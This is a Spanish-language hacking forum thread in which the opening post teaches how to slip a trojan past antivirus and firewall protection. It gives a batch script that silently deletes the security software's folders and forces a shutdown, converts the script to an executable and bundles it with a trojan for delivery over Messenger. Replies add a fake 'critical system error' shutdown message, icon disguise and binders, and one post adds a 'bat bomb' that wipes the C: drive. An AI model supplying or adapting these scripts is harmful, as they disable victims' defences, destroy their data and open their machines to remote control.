Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 30, 2008, 04:36:29
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Hack Novato  |  Troyanos y virus (Moderadores: -Erick-(Vacaciones), Angelus_7722)  |  Tema: Intrusión con Bat y Troyano Detectable!!! 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] 2 3 4 5 Ir Abajo Imprimir
Autor Tema: Intrusión con Bat y Troyano Detectable!!!  (Leído 15965 veces)
Viper
Visitante
« en: Enero 04, 2005, 02:01:36 »
COMO PENETRAR EN UN SISTEMA PROTEGIDO POR ANTIVIRUS Y FIREWALL  ACTUALIZADOS MEDIANTE UN TROYANO

Nota: Si tenéis prisa y no os tenéis que desconectar podéis descargar el manual desde aquí:
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
http://usuarios.lycos.es/titoferre/manual.doc


Empecemos, para empezar vamos a trabajar con archivos por lotes o como muchos los conocen BAT’S, pues bien un archivo .bat lo único que hace es ejecutar las ordenes del sistema que nosotros pongamos, y el lenguaje es muy sencillo ya que casi todo el mundo lo conoce Tongue.

CREANDO EL ARCHIVO .BAT

Bien para crear el archivo es muy fácil, debemos iniciar el bloc de notas, supongo que todos sabéis donde esta, rápido acceso “inicio, ejecutar, y escribimos: notepad.exe”
Vale ya lo tenemos abierto, ahora deberemos empezar a escribir el código, escribiremos lo siguiente:

    @ echo off Esto lo pondremos para que no muestre ningún comando por pantalla.
cd \ Con esto nos colocaremos en c:\
cd “Archivos de programa” Ahora estamos en Archivos de programa
del /Q /S “Norton antivirus” Esto se cargara el Norton de la victima
No os olvidéis de las comillas

Aquí tenéis que usar vuestra cabeza e intentar averiguar la ruta de su antivirus, seguramente estarán instalados por defecto, así que solo  tienes que adivinar el antivirus que tiene, puedes poner esta línea de comandos tantas veces que quieras y probar con todos los antivirus que quieras por ejemplo:

del antivirus1
del antivirus2
del antivirus3

No importa que no existan si no existen no pasa nada.

Esto le dejara sin antivirus, para cargarse el firewall deberemos hacer lo mismo con la ruta del firewall, probad con los mas famosos no tengáis miedo a escribir rutas erróneas que no pasara nada, no se les mostrara nada por pantalla.
 
Ahora viene el comando bonito que le reiniciara el ordenador para que lo que hemos hecho de su fruto y los antivirus y firewalls no arranquen.

shutdown –s –t 1

Esto le apagara la maquina en 1 segundo Wink
La cosa es que la estructura quedaría así:

    @ echo off
cd \
cd “archivos de programa”
del /Q /F /S “Nombre de la carpeta del antivirus”
del /Q /F /S “Nombre de la carpeta del firewall”
shutdown –s –t 1


Ahora vamos a Archivo guardar como y elegimos en la pestaña desplegable Todos los archivos y en el recuadro del nombre ponemos la extensión .bat

Ya tenemos listo el programa para borrarle los programas, si queréis ser malos también podéis borrarle todo lo que queráis jaja, pero este manual es para poder entrar en la victima mediante un troyano detectable.

ENCRIPTAR EL CODIGO DE FUENTE Y CONVERTIR EL .BAT EN UN EJECUTABLE .COM

Para ello utilizaremos el programa bat2exec que lo podéis descargar de donde suelo colgar las cosas Tongue
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
http://usuarios.lycos.es/titoferre/bat2exec.zip
he creado un léeme dentro del zip para que sepáis utilizarlo.

Ahora por ultimo solo debéis infectarlo con el troyano que mas os guste, como no cual recomiendo? XDDD Ptakks resurrection III, es que entre ese preciado troyano y yo hay una larga y bonita historia y le tengo cariño, pero podéis utilizar cualquier otro. Pero ya que hice el manual de ptakks podríais utilizarlo y sacarle provecho.

PD: Este manual esta pensado para que el sistema remoto al que entraremos tenga instalado los programas por defecto, y las rutas por defecto y para que la transferencia del archivo sea vía messenger. (El típico usuario vamos)

Saludos
« Última modificación: Julio 10, 2008, 01:39:27 por ManCuerTex (ViPeR) » En línea
RexMaster
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1213


AM, CM, MM

favorde@preguntar.me
Ver Perfil WWW
« Respuesta #1 en: Enero 04, 2005, 03:24:18 »
qué ocurre si el antivirus o firewall que deseas eliminar está corriendo en este preciso momento??
no creo que funcione correctamente la función "delete" (del)  :-\

pero si te ha funcionado, y lo recomiendas, deberé confiar en ti amigo.

saludos
RexMaster
« Última modificación: Julio 10, 2008, 01:25:24 por ManCuerTex (ViPeR) » En línea
-   :. RexMaster .:   -


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
Como poner mi diseño de firma en mis posts
Viper
Visitante
« Respuesta #2 en: Enero 04, 2005, 03:28:50 »
No pasa nada, porque lo que no eliminara sera el .exe eliminara todo lo demas, y luego al reiniciar la maquina el ejecutable del antivirus o firewall no podra arrancar sin todo lo demas.
En línea
RexMaster
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1213


AM, CM, MM

favorde@preguntar.me
Ver Perfil WWW
« Respuesta #3 en: Enero 04, 2005, 03:49:41 »
GRACIAS... una última duda...
continuando con lo de eliminar el AV o firewall
al tratar de borrar este archivo que está en uso (residente en memoria), ¿no activa algún mensaje de error??

ya sé que debería comprobarlo por mi mismo, pero confío en que tú ya lo has hecho antes, y quisiera conocer tus comentarios al respecto.
porque si esto funciona, sería muy peligroso, pues practicamente podrías destruir cualquier información de una victima.  (mucho poder destructivo)   :-\  Lips Sealed

RexMaster
« Última modificación: Julio 10, 2008, 01:25:37 por ManCuerTex (ViPeR) » En línea
-   :. RexMaster .:   -


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
Como poner mi diseño de firma en mis posts
Viper
Visitante
« Respuesta #4 en: Enero 04, 2005, 08:18:44 »
No amigo al poner el modificador "/S" (Modo silencio) no envia ningun mensaje deberia enviar ningun mensaje de error al usuario ya que se salta por alto todo lo sucedido y se dedica unicamente a borrar.

saludos
En línea
vassily
Visitante
« Respuesta #5 en: Enero 04, 2005, 11:41:20 »
Oye Viper k pues apenas k me interesaba tanto pero no me lo puedo bajar no se si me lo puedas pasar a mi mail ya que lo estuve haciendo y me gusto Tongue
Ahi te ves dime si te madno un mensaje para date mi correo o me envias me dices k show
Ahi se evn se cudian
En línea
k4ron73
Colaborador
*****
Desconectado Desconectado

Mensajes: 912



Ver Perfil
« Respuesta #6 en: Enero 05, 2005, 09:45:41 »
El Manual está excelente, gracias Viper!! A mi me gustaría añadir un par de cosillas:

- Si en el comando shutdown -s -t 1 añades también -f es mucho mejor, ya que fuerza a cualquier programa a apagarse. Mucho más seguro y efectivo.
- Antes de mandar el archivo por lotes cambiado a ".exe" o ".com"... yo también le cambiaría el icono para que fuera algo menos sospechoso. Se puede cambiar usando el ResHack (Resouce Hacker) es gratis y muy facil de manejar

Un saludo!!
« Última modificación: Julio 10, 2008, 01:25:51 por ManCuerTex (ViPeR) » En línea
Viper
Visitante
« Respuesta #7 en: Enero 05, 2005, 03:06:54 »
jeje gracias a todos Wink
En línea
mircop�
Visitante
« Respuesta #8 en: Enero 05, 2005, 03:36:54 »
viper -- realmente esta muy bueno este paqueño pero poderoso tuto ----queria aprobechar la oprtunidad para comentar q todos tus mini manuales estan muy bueno ya q soy bastante esquisito con los tutos q existen en la red -- pero te tengo q reconocer q la verdad esta muy bueno------lo mismo digo de "k4ron73 "  -- todos los comentarios q hacen son muy productivos para gente nueva como yo  Roll Eyes
saludos chicos
feliz año !!!

y si les envio un archivo no lo acepten Shocked -- jajajaja
« Última modificación: Julio 10, 2008, 01:26:04 por ManCuerTex (ViPeR) » En línea
vassily
Visitante
« Respuesta #9 en: Enero 05, 2005, 03:58:45 »
Oye Viper que pues no me puedo bajar el archivo bat2exec.zip de la pagina:

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
No se si me lo peudas pasar por email o pones otro link creo que ya te sabes mi correo y si no te lo sabes este es:
swatmex @hotmail.com
Ahi la ven se cuidan
En línea
mircop
Visitante
« Respuesta #10 en: Enero 08, 2005, 04:22:17 »
che viper !!! estube haciendo  y la verdad q mas facil imposible muy bueno

para cuando sale el libro!!!!

jjaajaja

bbyes , see you!!
En línea
Viper
Visitante
« Respuesta #11 en: Enero 09, 2005, 03:06:38 »

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Busca ahi el nombre y descargalo, lycos no deja descargar ciertos tipos de archivos directamente sin pasar por la pagina principal Tongue

Saludo0os
En línea
vassily
Visitante
« Respuesta #12 en: Enero 09, 2005, 05:03:49 »
muy bien viper!
« Última modificación: Octubre 27, 2005, 02:33:10 por vassily » En línea
Viper
Visitante
« Respuesta #13 en: Enero 09, 2005, 07:02:33 »
Si investigais un poquito por el host, podeis encontrar un video llamado Follador.wmv xDDDDDDD
No os asusteiss!!! Tan solo es mi perro haciendo sus cosillas jajajajaja
Wink
En línea
vassily
Visitante
« Respuesta #14 en: Enero 09, 2005, 08:48:06 »
Hi
Oye Viper pienso atacar con el .com pero quiero cambiarle el tiempo de apagado del pc que sean 10 segundos para que asi no sea tan notorio como le hago???
Ademas yo tambien tengo el pttska ya que me lo baje de tu link y esta muy bueno
Ahi la ven se cuidan

Y no se podria unir un .com con un trojano con un binder o algo por el estilo?Huh
En línea
k4ron73
Colaborador
*****
Desconectado Desconectado

Mensajes: 912



Ver Perfil
« Respuesta #15 en: Enero 10, 2005, 07:23:50 »
Si quieres reiniciar a los 10 segundos puedes escribir: " shutdown –s –t 10 -f " sin comillas.
si además añades -c puedes escribir un comentario que se verá en la pantalla junto con la cuenta atrás... por ejemplo:

shtudown -s -t 10 -f -c "Error crítico de sistema, reiniciando en 10 segundos, cierre todas sus aplicaciones"
 Esta vez tienes que poner las comillas.

Lo mejor es que busques un buen binder que no sea detectado por el antivirus, y unas el archivo .com (o .exe) que has creado con el servidor del troyano, así se ejecutan los dos archivos a la vez. Lo malo es que casi todos los binders los detecta el antivirus.

Si encuentras alguno indetectable notificamelo, ok? porque yo también estoy buscando uno!
« Última modificación: Julio 10, 2008, 01:26:22 por ManCuerTex (ViPeR) » En línea
OiNT0
Visitante
« Respuesta #16 en: Enero 10, 2005, 12:20:20 »
Buenas,tengo dudas sobre un par de cosas espero que me podais ayudar  Smiley

Empezemos por /Q y /S vi que /S es para un modo silencioso pero Q no tengo ni idea de que es.
Tambien esta una cosa que no llego a entender si le damos una vez cd.. estamos en Mis documentos,vale pero si le ponemos dos veces cd..
                                                                  cd.. (estaremos en la unidad C ? )
Y ahora yo en mi propio Pc he probado de borrar carpetas nuevas creadas por mi mismo por ejemplo lo creo en Archivos de programa,digamos que la carpeta es Prueba1 pongo lo siguiente:

  @echo off
cd..
cd..
cd "archivos de programa"
del /Q /S "Prueba1"

y ahora digamos que quiero seguir borrando otros apartados que no esten en Archivos de programa si no en el escritorio.

  @echo off
cd..
cd..
cd "archivos de programa"
del /Q /S "Prueba1"
cd.. (voy a mis documentos)
cd.. (estoy en c)
del /Q /S "PruebaEscritorio"

Asi estaria correcto? Huh

Esas son algunas de mis dudas,se que pido bastante  Tongue

Saludos.
« Última modificación: Julio 10, 2008, 01:26:37 por ManCuerTex (ViPeR) » En línea
vassily
Visitante
« Respuesta #17 en: Enero 10, 2005, 12:47:35 »
Hi
Oye k4ron73  exactamente para k sirve el comando -f en tu post:
" shutdown –s –t 10 -f "
Quiero saber para k sirve y exactamente dek me peude ayudar
Ahi se ven se cuidan
« Última modificación: Julio 10, 2008, 01:26:49 por ManCuerTex (ViPeR) » En línea
OiNT0
Visitante
« Respuesta #18 en: Enero 10, 2005, 12:51:19 »
Cita de: vassily en Enero 10, 2005, 12:47:35
Hi
Oye k4ron73 exactamente para k sirve el comando -f en tu post:
" shutdown –s –t 10 -f "
Quiero saber para k sirve y exactamente dek me peude ayudar
Ahi se ven se cuidan

Como tal dijo K4ron73

- Si en el comando shutdown -s -t 1 añades también -f es mucho mejor, ya que fuerza a cualquier programa a apagarse. Mucho más seguro y efectivo.

Espero que te ayude.Saludos
« Última modificación: Julio 10, 2008, 01:27:02 por ManCuerTex (ViPeR) » En línea
Viper
Visitante
« Respuesta #19 en: Enero 10, 2005, 06:00:43 »
Cita de: OiNT0 en Enero 10, 2005, 12:20:20
Buenas,tengo dudas sobre un par de cosas espero que me podais ayudar  Smiley

Empezemos por /Q y /S vi que /S es para un modo silencioso pero Q no tengo ni idea de que es.
Tambien esta una cosa que no llego a entender si le damos una vez cd.. estamos en Mis documentos,vale pero si le ponemos dos veces cd..
                                                                  cd.. (estaremos en la unidad C ? )
Y ahora yo en mi propio Pc he probado de borrar carpetas nuevas creadas por mi mismo por ejemplo lo creo en Archivos de programa,digamos que la carpeta es Prueba1 pongo lo siguiente:

  @echo off
cd..
cd..
cd "archivos de programa"
del /Q /S "Prueba1"

y ahora digamos que quiero seguir borrando otros apartados que no esten en Archivos de programa si no en el escritorio.

  @echo off
cd..
cd..
cd "archivos de programa"
del /Q /S "Prueba1"
cd.. (voy a mis documentos)
cd.. (estoy en c)
del /Q /S "PruebaEscritorio"

Asi estaria correcto? Huh

Esas son algunas de mis dudas,se que pido bastante  Tongue

Saludos.

No pides mucho amigo, en seguida te lo explico Wink
el comando cd.. sirve para bajar un nivel en la ruta en la que te encuentras por ejemplo aora mismo estamos en:

C:\Programillas\Baratos\Ilegales

Ahora si pusiesemos Cd.. estariamos en
C:\Programillas\Baratos\
Si volvemos a poner cd.. nos quedamos en
C:\Programillas\
y si volvemos a poner cd..
Acabaremos en C:\

Para eso sirve el Cd..
Por eso en el manual pongo que esta creado para recibir el archivo en C:\Documents And settings\User\Mis documentos\Mis archivos recibidos
porque asi ponemos 4 veces Cd.. estaremos en C:\ aunque tambien podriamos sustituir los Cd.. por simplemente cambiar de unidad y volver a la anterior que seria:
D:
C:

esto iria a la unidad D:\ y luego regresaria a C:\ pero es mejor trabajar con cd.. asi vas aprendiendo en este caso a situarte por las carpetas Tongue

Amos a por lo que dices del modo silencioso Cheesy

/Q Es un modificador para que no pida ninguna confirmacion de eliminar al usuario, que no salga el mensaje ("¿Desea eliminar archivos?")
/S Fuerza la eliminacion de todos los archivos de los subdirectorios, por ejemplo si ponemos Del /Q /S C:\Pepe
Esto borrar todo el contenido de pepe incluyendo todos los subdirectorios, dejando vacias las carpetas.

NoTa: Cuando estes haciendo pruebas en casa no pongas   @echo off asi te saldran todas las acciones que hagas  por pantalla y sabras el porque no funcionan las cosas etc.. Wink

Saludo0os
« Última modificación: Julio 10, 2008, 01:27:19 por ManCuerTex (ViPeR) » En línea
k4ron73
Colaborador
*****
Desconectado Desconectado

Mensajes: 912



Ver Perfil
« Respuesta #20 en: Enero 11, 2005, 05:49:40 »
Si no estas seguro de cuantos "cd.." tienes que poner.. lo mejor es que pongas "CD\" y esto te lleva directamente hasta el directorio raíz (c:\).
« Última modificación: Julio 10, 2008, 01:27:37 por ManCuerTex (ViPeR) » En línea
OiNT0
Visitante
« Respuesta #21 en: Enero 11, 2005, 02:25:55 »
Gracias amigos,ahora ya se como destrosarles su Antivirus o Firewall.
Una cosa que he podido observar que los comandos /Q y /S no funcionan en Win98 y supongo que en Win mas antiguos tampoco(almenos me pasa ami). Grin
« Última modificación: Enero 11, 2005, 02:27:25 por OiNT0 » En línea
k4ron73
Colaborador
*****
Desconectado Desconectado

Mensajes: 912



Ver Perfil
« Respuesta #22 en: Enero 11, 2005, 02:29:24 »
si, debes de tener cuidado, porque algunos modificadores no funcionan en windows 98.. asi que pruebalos primero. de todas formas ten en cuenta que la mayoría de la gente tiene ya XP!
Me alegro de que os hayamos sido de ayuda
« Última modificación: Julio 10, 2008, 01:27:49 por ManCuerTex (ViPeR) » En línea
gecko
Miembro
*****
Desconectado Desconectado

Mensajes: 25


Ver Perfil Email
« Respuesta #23 en: Enero 11, 2005, 05:22:58 »
weno
hijos mios esta bien su tecnika
pero no creen k es un pko vijita

komo dice el amigo puedes kambiar el icono
pero esa tecnika es antigua y lo detecta el antivirusa



no se an preguntado komo la makina sabe k ikonos poner


por ejemplo por k al block de notas no le pone la makina un ikono de exel

facil por k la toda aplikacion tiene un kodigo k llama al ikono korrecto Cheesy

jejejeje

 otra kuestion

graxiaaz a ms-dos podemos ejecutar comandos muy destructivos, y sera esto explicado mas adelante


¿Que es una bomba Bat?


Una bomba bat es un archivo con extension bat qu en su interior lleva comandos de ms-dos capaces de borrar, copiar, etc...


Funcionamiento


Las bombas bat funcionan de una forma muy sencilla, es necesario hacerles doble clic xD
Al ejecutarlas tambien se ejecutan los comandos dando paso a las acciones ke ellos llevana cabo


Comandos


echo off : este comando sirve para ke en la pantalla no aparezca eliminando archivo...., copiando a system..., etc

cls : Este otro comando sirve para borrar la pantalla y para que no se descubran nuestros actos

deltree : borra un directorio completo

del: borrar

/y : esta linea se pone detras de un comando y antes de un directorio, sirve para ejecutar la accion del comando sin preguntar


Construyendo una Bomba bat


para construir una bomba bat debemos abrir el bloc de notas y escribir unas lineas como estas :

echo off
cls
echo Espera mientras me jodo tu PC
deltree /y c:\

Y lo guardamos como un archivo con extension bat
(.bat)
Al ser guardado con la extension .bat y ejecutado, estas lineas borraran completo el directorio c: , incluyendo iconos y todo lo demas xD

Conclusion


Las bombas bat son muy efectivas cuando keremos joder algo rapido, cuando queremos borrar algun antivirus para meter un troyano, etc...
Solo tenemos ke darle usos creativo



MAS

luego por k ya me voy :d solo me dejan usar la pc 1 veces a la semana Cheesy
« Última modificación: Julio 10, 2008, 01:28:03 por ManCuerTex (ViPeR) » En línea
Viper
Visitante
« Respuesta #24 en: Enero 11, 2005, 05:54:49 »
jeje gracias por la explicacion amigo Wink

saludos
En línea
Páginas: [1] 2 3 4 5 Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Hack Novato  |  Troyanos y virus (Moderadores: -Erick-(Vacaciones), Angelus_7722)  |  Tema: Intrusión con Bat y Troyano Detectable!!! « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC